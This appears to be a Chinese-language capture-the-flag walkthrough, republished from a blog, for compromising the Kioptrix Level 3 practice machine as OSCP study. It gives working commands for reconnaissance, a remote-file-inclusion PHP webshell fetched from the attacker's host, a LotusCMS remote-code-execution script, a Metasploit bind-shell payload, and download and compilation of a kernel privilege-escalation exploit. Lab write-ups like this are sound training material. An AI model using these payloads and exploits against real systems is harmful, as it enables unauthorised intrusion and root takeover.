渗透Kioptrix-Level 3靶机
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Kioptrix-Level 3靶机有一个初步的了解
一、信息收集阶段
1、扫描网段,发现主机
按照惯例对虚拟机DHCP网段进行nmap扫描
nmap -sP 192.168.0.0/24
2、扫描主机详细信息
nmap -sT -sV -sC -O 192.168.0.185
# -sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
# -sV 尝试确定每个打开端口上运行的服务的版本
# -sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
80端口,存在http服务。浏览器尝试访问
3、扫描http服务目录
dirb http://192.168.0.185
#扫描刚才访问的http
发现phpMyAdmin登录页面发现phpMyAdmin登录页面(用弱口令爆破失败,可能是我的字典不行)
发现登录页面2
(可以尝试是否存在文件包含漏洞?远程包含或者本地包含)
4、查看http服务的中间件跟开发语言版本
whatweb -v 192.168.0.185
二、攻击面寻找阶段
1、远程包含漏洞测试
通过信息收集阶段我们知道使用php语言,那么php伪造这个时候可以发挥用处,测试能不能远程文件包含www.baidu.com
http://192.168.0.185/index.php?system=http://www.baidu.com
2、网站框架信息收集
三、渗透攻击阶段
1、一句话木马尝试攻击(远程文件包含)
(1)在kali上写执行远程文件包含的一句话木马
<?php fputs(fopen('shell.php','w'),'<?php eval($ POST[pass])?>);?>
(2)把一句话木马放到攻击机kali的html目录
(3)然后在目标机web网站通过hackbar利用文件包含漏洞
http://192.168.0.185/index.php?system=http://192.168.0.17/1.php
2、通过网站框架历史漏洞尝试攻击
(1)知道CMS是lotusCMS,接下来通过searchsploit搜索公开的漏洞
searchsploit lotusCMS
(2)通过https://www.exploit-db.com/下载利用文件exploit
(3)进入metasploit框架使用攻击模块
msfconsole
search lotuscms
use 0
(4)查看/设置payload设置
set rhosts 192.168.0.185#设置目标IP
set uri/index.php?system=Admin #登录界面
set payload generic/shell_bind_tcp #设置payload
四、提权阶段
1、渗透后靶机的信息收集
2、查找系统版本提权漏洞
searchsploit linux 2.6.2
(1)漏洞太多,看不过来 直接加过滤
searchsploit privilege|grep linux |grep 2.6.2
# privilege提权漏洞 过滤显示linux系统,过滤显示2.6.2版本
3、攻击机跟靶机下载exp文件
(1)因为OSCP考试严格限制使用metasploit,所以这个针对LotusCMS的exp最好通过github获取
git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit
(2)执行利用文件脚本
./lotusRCE.sh 192.168.0.185
(3)根据提示输入参数(本机IP跟监听端口)
(4)结合内核版本,这里使用的exp文件是40839.c(如果考试的时候不能确定使用哪个exp,尽可能的都尝试)
searchsploit 40839.c -m
(5)移动利用文件到攻击机/var/www/html
(6)靶机下载exp
python -c 'import pty;pty.spawn("/bin/bash")' ##python条用shell终端
wget http://192.168.0.17/40839.c
(7)切换到tmp目录下载
4、靶机编译exp提权
gcc -o 40839 40839.c
(1)编译失败分析(利用了gpt分析原因)
(2)重新编译
gcc -pthread 40839.c -o c -lcrypt
./c #文件修改密码:123456
#相当于是篡改了firefart用户的密码,这个用户具有root权限,所以su firefart就相当于提权了
声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!
原文地址:https://blog.csdn.net/weixin_46926338/article/details/144364389
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!